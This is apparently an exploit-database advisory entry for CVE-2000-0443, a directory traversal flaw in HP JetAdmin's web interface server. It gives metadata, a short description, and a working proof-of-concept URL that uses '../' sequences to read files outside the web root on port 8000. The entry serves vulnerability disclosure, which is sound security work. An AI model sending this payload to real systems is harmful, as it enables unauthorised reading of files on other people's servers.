HP JetAdmin 5.5.177/jetadmin 5.6 - Directory Traversal

Author: Ussr Labs
type: remote
platform: cgi
port: 8000.0
date_added: 2000-05-24  
date_updated: 2012-07-19  
verified: 1  
codes: CVE-2000-0443;OSVDB-1350  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 19956.txt  

source: https://www.securityfocus.com/bid/1243/info

By default JetAdmin Web Interface Server listens on port 8000. By requesting a specially formed URL which includes "../" it is possible for a remote user to gain read-access to any files outside of the web-published directory.

http://target:8000/cgi/wja?page=/../../../filename